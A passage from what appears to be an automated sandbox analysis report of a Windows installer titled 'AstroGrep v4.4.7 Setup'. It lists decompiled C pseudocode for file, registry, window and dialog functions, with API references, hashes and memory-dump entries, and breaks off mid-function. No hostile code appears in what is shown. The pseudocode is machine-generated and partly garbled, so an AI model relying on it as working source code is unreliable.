                                                                                                              • Part of subcall function 00405C8D: wsprintfA.USER32 ref: 00405C9A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: FilePointerwsprintf
                                                                                                            • String ID:
                                                                                                            • API String ID: 327478801-0
                                                                                                            • Opcode ID: 764acf2aeb277f9e06bdeffef5fa042cff7d54f69f19df9b32342fbbe382f709
                                                                                                            • Instruction ID: a9483199a9c1f24fdd03f346660dbac79c1e67f8a05fdc412783a5a7fba403a9
                                                                                                            • Opcode Fuzzy Hash: 764acf2aeb277f9e06bdeffef5fa042cff7d54f69f19df9b32342fbbe382f709
                                                                                                            • Instruction Fuzzy Hash: BCE04F76A04100ABF701FBA6AE49DBF776ADB50318B60453BF601F10C1D67D89069A3E
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00402B44, Relevance: 1.5, APIs: 1, Instructions: 22registryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 75%
                                                                                                            			E00402B44(void* __eflags, void* _a4) {
				char* _t8;
				intOrPtr _t9;
				signed int _t11;

				_t8 = E00402A3A(0x22);
				_t9 =  *0x40a810; // 0x19f56c
				_t11 = RegOpenKeyExA(E00402B2F( *((intOrPtr*)(_t9 + 4))), _t8, 0,  *0x42e4b0 | _a4,  &_a4); // executed
				asm("sbb eax, eax");
				return  !( ~_t11) & _a4;
			}






                                                                                                            0x00402b58
                                                                                                            0x00402b5e
                                                                                                            0x00402b6c
                                                                                                            0x00402b74
                                                                                                            0x00402b7c

                                                                                                            APIs
                                                                                                            • RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B6C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: Open
                                                                                                            • String ID:
                                                                                                            • API String ID: 71445658-0
                                                                                                            • Opcode ID: 08f437b6b575c0d1784f99ac72875e6d7de6160551833be987b148fec970e4e7
                                                                                                            • Instruction ID: d438f0a484ed9c160f568b140fbb6a6f0821f4cba08bd088e2e240e06c4f75a3
                                                                                                            • Opcode Fuzzy Hash: 08f437b6b575c0d1784f99ac72875e6d7de6160551833be987b148fec970e4e7
                                                                                                            • Instruction Fuzzy Hash: 5FE04676240208AFDB00EFA9ED4AFA637ECBB18705F008425B609E60A1C678E5508B69
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00405A49, Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E00405A49(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                                                                                                            0x00405a4d
                                                                                                            0x00405a5d
                                                                                                            0x00405a65
                                                                                                            0x00000000
                                                                                                            0x00405a6c
                                                                                                            0x00000000
                                                                                                            0x00405a6e

                                                                                                            APIs
                                                                                                            • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040307A,00000000,00414420,000000FF,00414420,000000FF,000000FF,00000004,00000000), ref: 00405A5D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: FileWrite
                                                                                                            • String ID:
                                                                                                            • API String ID: 3934441357-0
                                                                                                            • Opcode ID: d04482319dc3028e4ce08f739f1cf32aeeec85f3b87b0f01a1fec36d148a5575
                                                                                                            • Instruction ID: 4baa6dbb94b5aed14ede1987b2b874979685841cdf923a54f3be7db8892ddb6c
                                                                                                            • Opcode Fuzzy Hash: d04482319dc3028e4ce08f739f1cf32aeeec85f3b87b0f01a1fec36d148a5575
                                                                                                            • Instruction Fuzzy Hash: 65E0EC3265425EAFDF109E659C40EEB7BACEB053A0F008933F925E2150D231E821DFA9
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00405A1A, Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E00405A1A(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                                                                                                            0x00405a1e
                                                                                                            0x00405a2e
                                                                                                            0x00405a36
                                                                                                            0x00000000
                                                                                                            0x00405a3d
                                                                                                            0x00000000
                                                                                                            0x00405a3f

                                                                                                            APIs
                                                                                                            • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004030C4,00000000,00000000,00402EEE,000000FF,00000004,00000000,00000000,00000000), ref: 00405A2E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: FileRead
                                                                                                            • String ID:
                                                                                                            • API String ID: 2738559852-0
                                                                                                            • Opcode ID: 9e9b74a17ccb5deaff559da35202fcfca8c983c6050daaa8761ff941af9ce947
                                                                                                            • Instruction ID: b949637607fe9c5fc006a161b6664aa16a088e5f06d71f7b71a40b2ab1c7b417
                                                                                                            • Opcode Fuzzy Hash: 9e9b74a17ccb5deaff559da35202fcfca8c983c6050daaa8761ff941af9ce947
                                                                                                            • Instruction Fuzzy Hash: 80E0EC3261425AABDF109E959C40FEB7B6CEF45360F048532F915E6590E231E8219FA9
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00402644, Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E00402644(void* __ebx) {
				void* _t2;
				void* _t8;
				void* _t10;
				void* _t12;

				_t2 = E00405CA6(_t8, _t10);
				if(_t2 != __ebx) {
					FindClose(_t2); // executed
				}
				 *0x42e488 =  *0x42e488 +  *((intOrPtr*)(_t12 - 4));
				return 0;
			}







                                                                                                            0x00402645
                                                                                                            0x0040264c
                                                                                                            0x00402653
                                                                                                            0x00402653
                                                                                                            0x004028d2
                                                                                                            0x004028de

                                                                                                            APIs
                                                                                                            • FindClose.KERNELBASE(00000000), ref: 00402653
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: CloseFind
                                                                                                            • String ID:
                                                                                                            • API String ID: 1863332320-0
                                                                                                            • Opcode ID: c1afc8ea0f91f816f2234f0e4a55c183c0d46910afa635dadd93745b14171a77
                                                                                                            • Instruction ID: 32766ff02233f0426bc7bdd87c226e3691ef929e115130d2ed5f0bac09877e7f
                                                                                                            • Opcode Fuzzy Hash: c1afc8ea0f91f816f2234f0e4a55c183c0d46910afa635dadd93745b14171a77
                                                                                                            • Instruction Fuzzy Hash: DCD01277B1810087E711FBA9AD8884E73A5DA513197308837D201F61C4D37CC94A567D
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00403F14, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E00403F14(intOrPtr _a12) {
				intOrPtr _v0;
				struct HWND__* _v4;
				int _t7;
				void* _t8;
				void* _t9;
				void* _t10;

				_t7 = SetDlgItemTextA(_v4, _v0 + 0x3e8, E00405D51(_t8, _t9, _t10, 0, _a12)); // executed
				return _t7;
			}









                                                                                                            0x00403f2e
                                                                                                            0x00403f33

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: ItemText
                                                                                                            • String ID:
                                                                                                            • API String ID: 3367045223-0
                                                                                                            • Opcode ID: 8aa622d62f3612e386cdd8105f3b6da4d9bec96a62dcb677111357ff110a6e3b
                                                                                                            • Instruction ID: cbe768feb37b9e58959a63a18694cb062dc1df2e3d0fb8c696893596ad792950
                                                                                                            • Opcode Fuzzy Hash: 8aa622d62f3612e386cdd8105f3b6da4d9bec96a62dcb677111357ff110a6e3b
                                                                                                            • Instruction Fuzzy Hash: 9FC04C75148600BFDA42AB95CC42F1FB799EF94715F00C92EB19CA51E1CA35C420DA26
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00403F60, Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E00403F60(int _a4) {
				struct HWND__* _t2;
				long _t3;

				_t2 =  *0x42dbd8; // 0x8003a
				if(_t2 != 0) {
					_t3 = SendMessageA(_t2, _a4, 0, 0); // executed
					return _t3;
				}
				return _t2;
			}





                                                                                                            0x00403f60
                                                                                                            0x00403f67
                                                                                                            0x00403f72
                                                                                                            0x00000000
                                                                                                            0x00403f72
                                                                                                            0x00403f78

                                                                                                            APIs
                                                                                                            • SendMessageA.USER32(0008003A,00000000,00000000,00000000), ref: 00403F72
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend
                                                                                                            • String ID:
                                                                                                            • API String ID: 3850602802-0
                                                                                                            • Opcode ID: 1e62087203bf6f43f0c9384ee7a624a046e3022ab191d81d5448d2709a656daf
                                                                                                            • Instruction ID: 75b6af85c7b4550c46e72781509667ec0f8baecc0ee27a44b040c7e6c7b1aa08
                                                                                                            • Opcode Fuzzy Hash: 1e62087203bf6f43f0c9384ee7a624a046e3022ab191d81d5448d2709a656daf
                                                                                                            • Instruction Fuzzy Hash: 1FC04875B88201BAEE218B609D4AF167BA8AB60B42F258429B211E60E0C674F410DA2D
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00403F49, Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E00403F49(int _a4) {
				long _t2;

				_t2 = SendMessageA( *0x42e408, 0x28, _a4, 1); // executed
				return _t2;
			}




                                                                                                            0x00403f57
                                                                                                            0x00403f5d

                                                                                                            APIs
                                                                                                            • SendMessageA.USER32(00000028,?,00000001,00403D7A), ref: 00403F57
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend
                                                                                                            • String ID:
                                                                                                            • API String ID: 3850602802-0
                                                                                                            • Opcode ID: d71ad897c2f2d45ed447b95b395c8a164bb0c93204989444b513c5694a0ce339
                                                                                                            • Instruction ID: 9ba269cb94747afcd00db45940492297b6475019a1e9eeef8f710f25602b24aa
                                                                                                            • Opcode Fuzzy Hash: d71ad897c2f2d45ed447b95b395c8a164bb0c93204989444b513c5694a0ce339
                                                                                                            • Instruction Fuzzy Hash: 71B01235684200BBFE325B00DE0DF457E62F768701F008034B300250F1C7B200A2DB29
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00405509, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E00405509(int _a4, CHAR* _a8) {
				int _t3;

				_t3 = GetDlgItemTextA( *0x42dbd8, _a4, _a8, 0x400); // executed
				return _t3;
			}




                                                                                                            0x0040551c
                                                                                                            0x00405522

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: ItemText
                                                                                                            • String ID:
                                                                                                            • API String ID: 3367045223-0
                                                                                                            • Opcode ID: 318c761e7d03a4792b39f91a0403b49a68554c31ad0ac7f657822979c07e75a0
                                                                                                            • Instruction ID: 5bc079f376c4397dc27e91e65bfdd94062f5f07280b0cdba8df2e4a8c8164f3b
                                                                                                            • Opcode Fuzzy Hash: 318c761e7d03a4792b39f91a0403b49a68554c31ad0ac7f657822979c07e75a0
                                                                                                            • Instruction Fuzzy Hash: 13B0927A908200BFCE025B40DD04E0ABF62BB98711F21C424F395640B086726022EB0A
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 004030C7, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E004030C7(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x409018, _a4, 0, 0); // executed
				return _t2;
			}




                                                                                                            0x004030d5
                                                                                                            0x004030db

                                                                                                            APIs
                                                                                                            • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E2D,?), ref: 004030D5
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: FilePointer
                                                                                                            • String ID:
                                                                                                            • API String ID: 973152223-0
                                                                                                            • Opcode ID: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
                                                                                                            • Instruction ID: 49fdcfdf8b1973cd13611e97ba0bfafd8618b6cb304eeeee9131019f9f046fb0
                                                                                                            • Opcode Fuzzy Hash: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
                                                                                                            • Instruction Fuzzy Hash: 03B01271644200BFDA214F00DF05F057B21A790700F10C030B748380F082712420EB4D
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00403F36, Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E00403F36(int _a4) {
				int _t2;

				_t2 = EnableWindow( *0x429864, _a4); // executed
				return _t2;
			}




                                                                                                            0x00403f40
                                                                                                            0x00403f46

                                                                                                            APIs
                                                                                                            • KiUserCallbackDispatcher.NTDLL(?,00403D13), ref: 00403F40
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: CallbackDispatcherUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 2492992576-0
                                                                                                            • Opcode ID: 30d96cd9fc0d8ad999d68dc10700da8fc20303459ddb892013b18747b66c33f5
                                                                                                            • Instruction ID: 0d109c2b2df33cddb2fdb4737f0edb640fcb727031da007fe45ed195bb05a301
                                                                                                            • Opcode Fuzzy Hash: 30d96cd9fc0d8ad999d68dc10700da8fc20303459ddb892013b18747b66c33f5
                                                                                                            • Instruction Fuzzy Hash: 57A012314041009BCB015B10DF04C097F61A750300B054430E1044403482310820FF09
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Non-executed Functions

                                                                                                            Function 00401000, Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 90%
                                                                                                            			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x42e410;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextA(_t128, "AstroGrep v4.4.7 Setup", 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x42e408;
				}
				return DefWindowProcA(_a4, _a8, _a12, _t102);
			}













                                                                                                            0x0040100a
                                                                                                            0x00401039
                                                                                                            0x00401047
                                                                                                            0x0040104d
                                                                                                            0x00401051
                                                                                                            0x0040105b
                                                                                                            0x00401061
                                                                                                            0x00401064
                                                                                                            0x004010f3
                                                                                                            0x00401089
                                                                                                            0x0040108c
                                                                                                            0x004010a6
                                                                                                            0x004010bd
                                                                                                            0x004010cc
                                                                                                            0x004010cf
                                                                                                            0x004010d5
                                                                                                            0x004010d9
                                                                                                            0x004010e4
                                                                                                            0x004010ed
                                                                                                            0x004010ef
                                                                                                            0x004010ef
                                                                                                            0x00401100
                                                                                                            0x00401105
                                                                                                            0x0040110d
                                                                                                            0x00401110
                                                                                                            0x00401112
                                                                                                            0x00401118
                                                                                                            0x0040111f
                                                                                                            0x00401126
                                                                                                            0x00401130
                                                                                                            0x00401142
                                                                                                            0x00401156
                                                                                                            0x00401160
                                                                                                            0x00401165
                                                                                                            0x00401165
                                                                                                            0x00401110
                                                                                                            0x0040116e
                                                                                                            0x00000000
                                                                                                            0x00401178
                                                                                                            0x00401010
                                                                                                            0x00401013
                                                                                                            0x00401015
                                                                                                            0x0040101f
                                                                                                            0x0040101f
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                            • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                            • GetClientRect.USER32 ref: 0040105B
                                                                                                            • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                            • FillRect.USER32 ref: 004010E4
                                                                                                            • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                            • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                                                            • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                            • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                            • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                            • DrawTextA.USER32(00000000,AstroGrep v4.4.7 Setup,000000FF,00000010,00000820), ref: 00401156
                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                            • DeleteObject.GDI32(?), ref: 00401165
                                                                                                            • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                            • String ID: AstroGrep v4.4.7 Setup$F
                                                                                                            • API String ID: 941294808-965371690
                                                                                                            • Opcode ID: 743dd018db8a108fdfb55826faff2fb237305abb1c3a72422579a1c27d61dc24
                                                                                                            • Instruction ID: 9af9226455e7fa8211e54ab4aa6b8deb1f4adf461e7c9b231a43246ca388c9df
                                                                                                            • Opcode Fuzzy Hash: 743dd018db8a108fdfb55826faff2fb237305abb1c3a72422579a1c27d61dc24
                                                                                                            • Instruction Fuzzy Hash: F0419B71804249AFCB058FA5CD459AFBBB9FF44310F00812AF961AA1A0C738EA51DFA5
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00405A78, Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 131stringmemoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E00405A78(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t13;
				long _t25;
				char* _t32;
				int _t38;
				void* _t39;
				intOrPtr* _t40;
				long _t43;
				CHAR* _t45;
				void* _t47;
				void* _t49;
				void* _t50;
				void* _t53;
				void* _t54;

				_t39 = __ecx;
				lstrcpyA(0x42b5f8, "NUL");
				_t45 =  *(_t53 + 0x18);
				if(_t45 == 0) {
					L3:
					_t13 = GetShortPathNameA( *(_t53 + 0x1c), 0x42b9f8, 0x400);
					if(_t13 != 0 && _t13 <= 0x400) {
						_t38 = wsprintfA(0x42b1f8, "%s=%s\r\n", 0x42b5f8, 0x42b9f8);
						_t54 = _t53 + 0x10;
						E00405D51(_t38, 0x42b5f8, 0x42b9f8, 0x42b9f8,  *((intOrPtr*)( *0x42e410 + 0x128)));
						_t13 = E004059A2(0x42b9f8, 0xc0000000, 4);
						_t49 = _t13;
						 *(_t54 + 0x18) = _t49;
						if(_t49 != 0xffffffff) {
							_t43 = GetFileSize(_t49, 0);
							_t6 = _t38 + 0xa; // 0xa
							_t47 = GlobalAlloc(0x40, _t43 + _t6);
							if(_t47 == 0 || E00405A1A(_t49, _t47, _t43) == 0) {
								L18:
								return CloseHandle(_t49);
							} else {
								if(E00405907(_t39, _t47, "[Rename]\r\n") != 0) {
									_t50 = E00405907(_t39, _t22 + 0xa, 0x4093b0);
									if(_t50 == 0) {
										_t49 =  *(_t54 + 0x18);
										L16:
										_t25 = _t43;
										L17:
